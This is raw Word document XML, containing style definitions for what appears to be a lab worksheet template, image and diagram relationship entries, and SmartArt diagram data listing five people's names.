    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="48">
    <w:name w:val="Reflection Q"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="49">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="50">
    <w:name w:val="Lab_Table_Style"/>
    <w:basedOn w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>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tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="51">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="Answer Gray"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="53">
    <w:name w:val="Config Window"/>
    <w:basedOn w:val="14"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="6"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="54">
    <w:name w:val="Page Head"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="auto" w:sz="18" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="10080"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data1.xml"/><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14.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId34"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1.png"/><Relationship Id="rId31" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing5.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle5.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout5.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data5.xml"/><Relationship Id="rId26" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing4.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors4.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle4.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data4.xml"/><Relationship Id="rId21" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle3.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data3.xml"/><Relationship Id="rId16" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data2.xml"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors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69C03CD-136D-4F07-8181-DE1BFAA94C50}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA13E494-016D-4628-9B1D-85CBD95A208D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Hassan Mahmoud Madkour</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7609CEE6-5FC9-4E34-B1A6-DA551BBAB985}" cxnId="{B05C1E00-B234-44AB-81CD-F72ABB2FCB96}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{645116D4-DB92-4ED4-BDD6-3FA618F9F657}" cxnId="{B05C1E00-B234-44AB-81CD-F72ABB2FCB96}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{205F91CE-2A1A-4724-8BCF-3DB06F5E0A70}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Ahmed Gomaa Hamed</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17D1142B-2EEA-4C86-97D0-6E1D497094C5}" cxnId="{C49E369A-D685-4E7D-8AD9-D429A695650C}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B28763FA-6F0B-458A-9D2D-BF5B86AC0393}" cxnId="{C49E369A-D685-4E7D-8AD9-D429A695650C}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22AE2FF3-6345-4217-8E89-DE174E826AB1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Fady Maged Sabry</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D8C89DD-4EAA-44EB-BA4A-B75CEDB02F0E}" cxnId="{49A9CEA4-BB80-43E3-A87B-714A09A213D7}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34E4442C-3D8B-459B-96AB-8C9BFEECC1E2}" cxnId="{49A9CEA4-BB80-43E3-A87B-714A09A213D7}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C0A7F8E-E77E-46E6-A22E-5F1C765FFEB1}" type="pres">
      <dgm:prSet presAssocID="{E69C03CD-136D-4F07-8181-DE1BFAA94C50}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{796F95E2-FDAB-472F-8114-6A6C37DE69B4}" type="pres">
      <dgm:prSet presAssocID="{EA13E494-016D-4628-9B1D-85CBD95A208D}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED3B2D2D-8F1B-49A7-ABC2-3177E7B0EAE5}" type="pres">
      <dgm:prSet presAssocID="{EA13E494-016D-4628-9B1D-85CBD95A208D}" presName="rect1" presStyleLbl="trAlignAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5FDA3F7-3846-4A0B-8C6B-804A96CF3D77}" type="pres">
      <dgm:prSet presAssocID="{EA13E494-016D-4628-9B1D-85CBD95A208D}" presName="rect2" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1FFFA188-03A5-4E78-9B30-F451A552ED4E}" type="pres">
      <dgm:prSet presAssocID="{645116D4-DB92-4ED4-BDD6-3FA618F9F657}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{111602C3-698F-43D8-B578-91C3A23DD1DF}" type="pres">
      <dgm:prSet presAssocID="{205F91CE-2A1A-4724-8BCF-3DB06F5E0A70}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35CC1509-1D05-4D52-B943-A6028ADC48B3}" type="pres">
      <dgm:prSet presAssocID="{205F91CE-2A1A-4724-8BCF-3DB06F5E0A70}" presName="rect1" presStyleLbl="trAlignAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F5AB7DF-6D64-456D-867A-BE487254BA7B}" type="pres">
      <dgm:prSet presAssocID="{205F91CE-2A1A-4724-8BCF-3DB06F5E0A70}" presName="rect2" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AEE006C-B714-4C98-8363-02549EFC6D81}" type="pres">
      <dgm:prSet presAssocID="{B28763FA-6F0B-458A-9D2D-BF5B86AC0393}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA1F0276-F09D-4423-A826-24F9FC4A7EAC}" type="pres">
      <dgm:prSet presAssocID="{22AE2FF3-6345-4217-8E89-DE174E826AB1}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{975CC684-1E93-45E1-82FF-1809E816EF32}" type="pres">
      <dgm:prSet presAssocID="{22AE2FF3-6345-4217-8E89-DE174E826AB1}" presName="rect1" presStyleLbl="trAlignAcc1" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborY="21741">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FF8736D7-9515-40B7-99A8-0C40AF97E8A9}" type="pres">
      <dgm:prSet presAssocID="{22AE2FF3-6345-4217-8E89-DE174E826AB1}" presName="rect2" presStyleLbl="fgImgPlace1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B05C1E00-B234-44AB-81CD-F72ABB2FCB96}" srcId="{E69C03CD-136D-4F07-8181-DE1BFAA94C50}" destId="{EA13E494-016D-4628-9B1D-85CBD95A208D}" srcOrd="0" destOrd="0" parTransId="{7609CEE6-5FC9-4E34-B1A6-DA551BBAB985}" sibTransId="{645116D4-DB92-4ED4-BDD6-3FA618F9F657}"/>
    <dgm:cxn modelId="{07B42401-1D44-4ADB-BF8B-60BB4DB2C973}" type="presOf" srcId="{22AE2FF3-6345-4217-8E89-DE174E826AB1}" destId="{975CC684-1E93-45E1-82FF-1809E816EF32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{7B2D3E4D-4AC7-4367-B240-A78179E47BD6}" type="presOf" srcId="{EA13E494-016D-4628-9B1D-85CBD95A208D}" destId="{ED3B2D2D-8F1B-49A7-ABC2-3177E7B0EAE5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{C49E369A-D685-4E7D-8AD9-D429A695650C}" srcId="{E69C03CD-136D-4F07-8181-DE1BFAA94C50}" destId="{205F91CE-2A1A-4724-8BCF-3DB06F5E0A70}" srcOrd="1" destOrd="0" parTransId="{17D1142B-2EEA-4C86-97D0-6E1D497094C5}" sibTransId="{B28763FA-6F0B-458A-9D2D-BF5B86AC0393}"/>
    <dgm:cxn modelId="{3D00B4A2-1997-43EC-B87E-C753C517B839}" type="presOf" srcId="{E69C03CD-136D-4F07-8181-DE1BFAA94C50}" destId="{4C0A7F8E-E77E-46E6-A22E-5F1C765FFEB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{49A9CEA4-BB80-43E3-A87B-714A09A213D7}" srcId="{E69C03CD-136D-4F07-8181-DE1BFAA94C50}" destId="{22AE2FF3-6345-4217-8E89-DE174E826AB1}" srcOrd="2" destOrd="0" parTransId="{5D8C89DD-4EAA-44EB-BA4A-B75CEDB02F0E}" sibTransId="{34E4442C-3D8B-459B-96AB-8C9BFEECC1E2}"/>
    <dgm:cxn modelId="{6749E6FE-7324-42CF-AE9C-63B2BF0D704A}" type="presOf" srcId="{205F91CE-2A1A-4724-8BCF-3DB06F5E0A70}" destId="{35CC1509-1D05-4D52-B943-A6028ADC48B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{09386680-C5E3-4754-B3CD-D2DE86171EE0}" type="presParOf" srcId="{4C0A7F8E-E77E-46E6-A22E-5F1C765FFEB1}" destId="{796F95E2-FDAB-472F-8114-6A6C37DE69B4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{EDC228BC-C263-455A-8037-56A72F13FD93}" type="presParOf" srcId="{796F95E2-FDAB-472F-8114-6A6C37DE69B4}" destId="{ED3B2D2D-8F1B-49A7-ABC2-3177E7B0EAE5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{D3D72514-4EB9-4DB0-971A-633962071D3C}" type="presParOf" srcId="{796F95E2-FDAB-472F-8114-6A6C37DE69B4}" destId="{C5FDA3F7-3846-4A0B-8C6B-804A96CF3D77}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{76B06336-FA71-45DB-918C-708EC2BC38A6}" type="presParOf" srcId="{4C0A7F8E-E77E-46E6-A22E-5F1C765FFEB1}" destId="{1FFFA188-03A5-4E78-9B30-F451A552ED4E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{2971AC78-A660-446F-B62A-D7DE8F2B094E}" type="presParOf" srcId="{4C0A7F8E-E77E-46E6-A22E-5F1C765FFEB1}" destId="{111602C3-698F-43D8-B578-91C3A23DD1DF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{6D648496-E16A-4198-9EC6-760CD247AF60}" type="presParOf" srcId="{111602C3-698F-43D8-B578-91C3A23DD1DF}" destId="{35CC1509-1D05-4D52-B943-A6028ADC48B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{D14C7AB1-8137-4539-B8F4-18A94A401FCA}" type="presParOf" srcId="{111602C3-698F-43D8-B578-91C3A23DD1DF}" destId="{4F5AB7DF-6D64-456D-867A-BE487254BA7B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{54DCF5C9-37EE-4C3C-AB17-FA498495EAB1}" type="presParOf" srcId="{4C0A7F8E-E77E-46E6-A22E-5F1C765FFEB1}" destId="{9AEE006C-B714-4C98-8363-02549EFC6D81}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{C7DA5512-BFA7-467F-8CD5-7848A1079FDB}" type="presParOf" srcId="{4C0A7F8E-E77E-46E6-A22E-5F1C765FFEB1}" destId="{FA1F0276-F09D-4423-A826-24F9FC4A7EAC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{A0149B5D-1C06-4808-B4FC-61858AE58B22}" type="presParOf" srcId="{FA1F0276-F09D-4423-A826-24F9FC4A7EAC}" destId="{975CC684-1E93-45E1-82FF-1809E816EF32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{EC6628AF-5543-47B9-9E2C-9CC131574723}" type="presParOf" srcId="{FA1F0276-F09D-4423-A826-24F9FC4A7EAC}" destId="{FF8736D7-9515-40B7-99A8-0C40AF97E8A9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrip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3DF611-9D46-4437-92B1-1C54B5B47B1C}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE22C4AB-5E1F-411E-B8A4-FC5FADB07A82}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Zakaria Yousry Zakaria</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{746660C4-C1FA-4649-B152-C91EB92D5DAC}" cxnId="{BA7EDB7E-DABF-42C6-802F-4E9D190ADCDF}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3650485C-8F14-4142-B202-900BC9C92A4B}" cxnId="{BA7EDB7E-DABF-42C6-802F-4E9D190ADCDF}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A74EABE-2A3C-4366-BD9A-66F3EEDDE2C5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Mariam Mohamed Fawzy</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{718588CA-7631-4863-B0AA-59B6990D5B50}" cxnId="{79509361-CB68-4B6B-BA4E-2C70EA367D3B}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F875CE65-A2EB-40E2-9936-487881C1B67A}" cxnId="{79509361-CB68-4B6B-BA4E-2C70EA367D3B}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48BF1673-48A2-4D1F-96E6-7B8A332CCC37}" type="pres">
      <dgm:prSet presAssocID="{C93DF611-9D46-4437-92B1-1C54B5B47B1C}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6A19566-F2FB-48FF-AAF5-9A3CEB2B62FB}" type="pres">
      <dgm:prSet presAssocID="{BE22C4AB-5E1F-411E-B8A4-FC5FADB07A82}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F26C90EF-DB7F-4ECA-944E-DCDDB98E59FA}" type="pres">
      <dgm:prSet presAssocID="{BE22C4AB-5E1F-411E-B8A4-FC5FADB07A82}" presName="rect1" presStyleLbl="trAlignAcc1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AA4DDCC-E871-49A6-A456-B4B0B1E0A509}" type="pres">
      <dgm:prSet presAssocID="{BE22C4AB-5E1F-411E-B8A4-FC5FADB07A82}" presName="rect2" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6C93EE6-78EB-47C8-9EB8-7764493483DF}" type="pres">
      <dgm:prSet presAssocID="{3650485C-8F14-4142-B202-900BC9C92A4B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F5901858-60A9-4D32-A92E-EC54D2A887BE}" type="pres">
      <dgm:prSet presAssocID="{6A74EABE-2A3C-4366-BD9A-66F3EEDDE2C5}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1BF891F-B4F6-470A-A2F1-A5B864054943}" type="pres">
      <dgm:prSet presAssocID="{6A74EABE-2A3C-4366-BD9A-66F3EEDDE2C5}" presName="rect1" presStyleLbl="trAlignAcc1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DE53E3E-EFB9-48A2-9A24-F1ED189F369C}" type="pres">
      <dgm:prSet presAssocID="{6A74EABE-2A3C-4366-BD9A-66F3EEDDE2C5}" presName="rect2" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C86B6426-B7EB-493D-98A5-D51AB6760A85}" type="presOf" srcId="{C93DF611-9D46-4437-92B1-1C54B5B47B1C}" destId="{48BF1673-48A2-4D1F-96E6-7B8A332CCC37}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{79509361-CB68-4B6B-BA4E-2C70EA367D3B}" srcId="{C93DF611-9D46-4437-92B1-1C54B5B47B1C}" destId="{6A74EABE-2A3C-4366-BD9A-66F3EEDDE2C5}" srcOrd="1" destOrd="0" parTransId="{718588CA-7631-4863-B0AA-59B6990D5B50}" sibTransId="{F875CE65-A2EB-40E2-9936-487881C1B67A}"/>
    <dgm:cxn modelId="{BA7EDB7E-DABF-42C6-802F-4E9D190ADCDF}" srcId="{C93DF611-9D46-4437-92B1-1C54B5B47B1C}" destId="{BE22C4AB-5E1F-411E-B8A4-FC5FADB07A82}" srcOrd="0" destOrd="0" parTransId="{746660C4-C1FA-4649-B152-C91EB92D5DAC}" sibTransId="{3650485C-8F14-4142-B202-900BC9C92A4B}"/>
    <dgm:cxn modelId="{845998A4-31A0-4956-8ADA-5C59A15E7995}" type="presOf" srcId="{BE22C4AB-5E1F-411E-B8A4-FC5FADB07A82}" destId="{F26C90EF-DB7F-4ECA-944E-DCDDB98E59FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
